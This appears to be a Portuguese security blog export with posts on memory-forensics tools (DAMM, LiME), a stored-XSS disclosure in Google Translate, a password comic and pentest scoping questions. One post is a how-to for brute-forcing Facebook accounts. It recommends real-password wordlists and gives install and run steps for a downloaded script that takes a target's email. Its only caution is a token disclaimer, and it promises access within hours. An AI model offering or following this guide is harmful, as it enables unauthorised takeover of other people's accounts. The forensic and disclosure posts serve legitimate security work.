<div class="crayon-line" id="crayon-5661f791a9922714708817-27" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">u</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FIELD</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FIELD</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Use</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">the </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">specified </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">fields </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">to</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">determine </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">uniqueness </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">of</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-28" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">memobjs </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">when </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">diffing</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-29" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">warnings </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Look </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">for</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">suspicious </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">objects</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-30" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">q</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Query </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">the </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">supplied </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">via</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">)</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span></div>
</blockquote>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Algumas das detecções que a ferramenta faz, listo abaixo:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>incorrect parent/child relationships</li>
<li>hidden processes</li>
<li>incorrect binary path</li>
<li>incorrect default priority</li>
<li>incorrect session</li>
<li>loaded/run from temp directory</li>
<li>bogus extensions</li>
<li>hidden DLLs</li>
<li>PE headers in injections</li>
<li>SIDs giving domain access</li>
<li>debug privileges</li>
</ul>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<a href="https://github.com/504ensicsLabs/DAMM" target="_blank">Aqui </a>vocês podem saber mais sobre a ferramenta, ou baixá-la diretamente <a href="https://github.com/504ensicsLabs/DAMM" target="_blank">desse link</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Divirtam-se!</div>
<div style="text-align: justify;">
<br /></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-9694508021482479622015-11-29T09:50:00.003-02:002015-11-29T11:53:21.870-02:00XSS no Google TranslatorHá tempos atrás encontrei uma vulnerabilidade de Stored XSS no Blogspot e o Google simplesmente ignorou-me, dizendo que não era importante já que não permitia acessar o mesmo cookie da conta de Gmail para fazer o session hijacking (como se executar qualquer javascript na máquina do usuário não fosse importante hahahah). Tanto que uso essa mesma vulnerabilidade até hoje para demonstrar o XSS em alguns de meus cursos.<br />
<br />
Mas será que dessa vez vão fazer alguma coisa?<br />
<br />
No Google Translator, temos a possibilidade de subir arquivos para serem traduzidos, só que pelo jeito não há alguns filtros necessários. Vamos ver abaixo...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-LsHFPqs32NE/VlrlB5WaqaI/AAAAAAAADVE/c_wE37_BNN8/s1600/xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://3.bp.blogspot.com/-LsHFPqs32NE/VlrlB5WaqaI/AAAAAAAADVE/c_wE37_BNN8/s400/xss1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
O arquivo enviado é bem simples, uma simples tag "img src" com um javascript junto:<br />
<br />
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-AYS12b5OuFI/Vlrm_rE6A8I/AAAAAAAADVg/zlnDycwfl_s/s1600/xss4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="http://2.bp.blogspot.com/-AYS12b5OuFI/Vlrm_rE6A8I/AAAAAAAADVg/zlnDycwfl_s/s400/xss4.png" width="400" /></a></div>
<br /></blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-N4OtuiK9di0/VlrmRBGhhjI/AAAAAAAADVQ/eqpo9QQG164/s1600/xss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="http://1.bp.blogspot.com/-N4OtuiK9di0/VlrmRBGhhjI/AAAAAAAADVQ/eqpo9QQG164/s400/xss2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Basta subir o arquivo e clicar em "Traduzir" para vermos o resultado:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1dBv4vJN8Tw/VlrmRDSl3WI/AAAAAAAADVc/iDjZbCC0zw0/s1600/xss3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://4.bp.blogspot.com/-1dBv4vJN8Tw/VlrmRDSl3WI/AAAAAAAADVc/iDjZbCC0zw0/s400/xss3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
Interessante, não?! A vulnerabilidade já foi publicada na lista Full Disclosure.Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-61256789000840610652015-11-18T11:26:00.004-02:002015-11-18T11:26:59.057-02:00Ataque de força bruta em contas do FacebookPara quem assiste Mr. Robot, e que antes achava que ataque de força bruta contra contas de Facebook era algo que não funcionava, sinto dizer que se enganaram, felizmente :-)<br />
<br />
Já circulava na net há um tempo um belo script que nos ajuda nessa empreitada para quem precisa, em alguma situação qualquer, realizar esse tipo de ataque.<br />
<br />
APENAS DEIXO BEM CLARO QUE NÃO SOU RESPONSÁVEL POR QUEM REALIZAR ESSE TIPO DE ATAQUE, E ESSE POST É INFORMATIVO E PARA FINS DE PESQUISA.<br />
<br />
Após o aviso formal necessário, vamos seguir adiante...<br />
<br />
Uma das principais coisas para um ataque desse tipo é ter uma boa wordlist, e isso pode ser um pouco difícil de achar ou construir. Não adianta dizer que basta usar aplicativos que geram combinações que criam uma wordlist prq essa não é a melhor alternativa, já que as pessoas não costuma usar combinações simples para suas senhas, mas sim conteúdos mnemônicos para facilitar suas vidas. Portanto, uma wordlist construída com senhas reais seria uma boa pedida.<br />
<br />
Então para essa primeira ferramenta, eu indico as wordlists do site <a href="https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm" target="_blank">CrackStation</a>, pois são bem efetivas e bem construídas.<br />
<br />
Além da wordlist, você precisará também de uma máquina Linux com o Python instalado, bem como o Python Mechanize, que pode instalar com o seguinte comando:<br />
<blockquote class="tr_bq">
#apt-get install python-mechanize</blockquote>
Com sua máquina já configurada, basta baixar o script para o ataque através <a href="http://www.4shared.com/file/cTjN7zhwce/facebook.html?" target="_blank">desse link</a>. E então setar a permissão para execução, com o comando:<br />
<blockquote class="tr_bq">
#chmod +x facebook.py </blockquote>
E quando for executar o script, você será avisado de que precisa informar o username ou email da conta alvo, e posteriomente o caminho onde está sua wordlist. Então basta ir fazer um lanche, ou dormir, que depis de algumas horas já terá o acesso à conta alvo :-) É óbvio que, através de um ataque com wordlist, é necessário um pouco de sorte para que a senha da conta alvo esteja dentro de sua wordlist.<br />
<br />
Divirtam-se!Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com3tag:blogger.com,1999:blog-3466062841868611806.post-37822317652006014942015-11-14T11:51:00.001-02:002015-11-14T11:51:55.308-02:00LiME – Linux Memory ExtractorNas versões mais recentes do kernel do Linux, já não é mais possível fazer a extração do conteúdo da memória física de uma máquina Linux usando o "dd". No entanto algumas outras formas já surgiram para resolver esse problema.<br />
<br />
Uma delas é usar o módulo "fmem", como descrito no blog do <a href="http://eriberto.pro.br/blog/?p=279" target="_blank">João Eriberto</a>. Essa maneira funciona muito bem quando pensamos apenas em máquinas Linux com o kernel acima da versão 2.6. Entretanto, se precisarmos de algo com mais funcionalidades precisamos usar outra ferramenta.<br />
<br />
Essa outra ferramenta pode muito bem ser o LiME - Linux Memory Extractor. O LiME é um LKM (Loadable Kernel Module) que funciona muito bem para a realização de extração de dump de memória física não só de máquinas Linux, mas dispositivos Android também.<br />
<br />
Para fazer uso do mesmo, é preciso primeiro fazer download do mesmo <a href="https://github.com/504ensicsLabs/LiME/archive/v1.7.2.zip" target="_blank">AQUI </a>e descompactá-lo. Depois disso, basta compilá-lo com o comando "make".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/--wnOBcZImjc/Vkc684IyKDI/AAAAAAAADUQ/3w3XBxDXzTI/s1600/21784348138_0e259994ce.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/--wnOBcZImjc/Vkc684IyKDI/AAAAAAAADUQ/3w3XBxDXzTI/s400/21784348138_0e259994ce.jpg" width="400" /></a></div>
Duas coisas interessantes: a ferramenta permite fazer a extração via rede e só precisa usar o comando insmod para carregar o módulo. Veja abaixo os comandos:<br />
<br />
<blockquote class="tr_bq">
<a href="https://www.blogger.com/null" name="user-content-usage" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;"></a><br />
<pre style="background-color: #f7f7f7; border-radius: 3px; box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><a href="https://www.blogger.com/null" name="user-content-usage" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; max-width: initial; overflow: initial; padding: 0px; word-break: normal; word-wrap: normal;">insmod ./lime.ko "path=<outfile port="" tcp:="">> format=<raw lime="" padded=""> [dio=<0>]"
path (required): outfile ~ name of file to write to on local system (SD Card)
tcp:port ~ network port to communicate over
format (required): raw ~ concatenates all System RAM ranges
padded ~ pads all non-System RAM ranges with 0s
lime ~ each range prepended with fixed-size header containing address space info
dio (optional): 1 ~ attempt to enable Direct IO
0 ~ default, do not attempt Direct IO
localhostonly (optional): 1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)<!--0--></0></raw></outfile></code></a></pre>
<a href="https://www.blogger.com/null" name="user-content-usage" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;">
</a></blockquote>
<br />
E no caso de dispositivos Android, os comandos são (um exemplo):<br />
<blockquote class="tr_bq">
<a href="https://www.blogger.com/null" name="user-content-example" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;"></a><br />
<pre style="background-color: #f7f7f7; border-radius: 3px; box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><a href="https://www.blogger.com/null" name="user-content-example" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; max-width: initial; overflow: initial; padding: 0px; word-break: normal; word-wrap: normal;">$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"</code></a></pre>
<a href="https://www.blogger.com/null" name="user-content-example" style="box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; outline: 0px;">
</a></blockquote>
É possível assistir um vídeo de apresentação da ferramenta, que permitirá entender melhor seu funcionamente, <a href="https://www.youtube.com/watch?v=oWkOyphlmM8" target="_blank">clicando aqui</a>.<br />
<br />
Para os profissionais da área de forense, é uma grande ferramenta. Entretanto, lembrem-se de duas coisas importantíssimas: baixe e compile o LiME em um pendrive ou disco externo que usará com o kit de ferramentas que preparou previamente para o processo de coleta de dados, e não apenas o LiME, mas também todos os demais binários utilizados, como o insmod, devem ser preparados por você como parte de um kit forense, e não aqueles que existem dentro do disco a ser coletado como evidência.<br />
<br />
Divirtam-se!Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-71895414413839773082015-11-13T11:48:00.001-02:002015-11-14T11:54:50.217-02:00Para quem acha que complexidade é mais importante que o tamanho da senha...<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-L7B8A_pwYk4/Vkc9HQTKDnI/AAAAAAAADUc/IF3oyMUyuZs/s1600/static1.squarespace.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://2.bp.blogspot.com/-L7B8A_pwYk4/Vkc9HQTKDnI/AAAAAAAADUc/IF3oyMUyuZs/s400/static1.squarespace.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Seguindo o raciocínio da tirinha acima, vocês podem usar <a href="https://howsecureismypassword.net/" target="_blank">esse site para testar </a>o quão forte é sua senha :-)<br />
<br />
Bom final de semana à todos e aproveitem a sexta-feira 13!Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-19530003186390503612015-11-11T12:49:00.002-02:002015-11-11T12:49:22.720-02:00Quais perguntas devo fazer para orçar um teste de invasão (pentest)?<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Um grande amigo da área de segurança e forense me perguntou sobre quais informações precisaríamos levantar para orçar um pentest para um cliente. Como já respondi a mesma pergunta algumas outras vezes para outros amigos e conhecidos, achei interessante usar a resposta que dei ao mesmo para um post aqui no blog. Até mesmo porque essa é uma questão que sempre surge nos cursos de Pentest que realizo.</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Obviamente que só coloquei aqui as principais perguntas, pois muitas outras podem surgir e outras ainda precisarão ser suprimidas dependendo do cenário atendido.</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Essas são as perguntas que precisamos que sejam respondidas para criarmos a proposta final para o cliente. Com esses dados poderemos determinar escopo e quantidade de horas (para calcular valores e etc).</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
----------------------------------------//<span style="font-size: 12.8px;">----------------------------------------//</span><span style="font-size: 12.8px;">----------------------------------------</span></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<b>Questões gerenciais</b></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Os executivos estão cientes dos testes que serão realizados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Qual o principal tipo de informação que criaria um grande risco para organização se exposta, comprometida ou apagada?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há procedimentos de Disaster Recovery onde os testes serão realizados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<b>Questões para Administradores de Sistemas</b></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
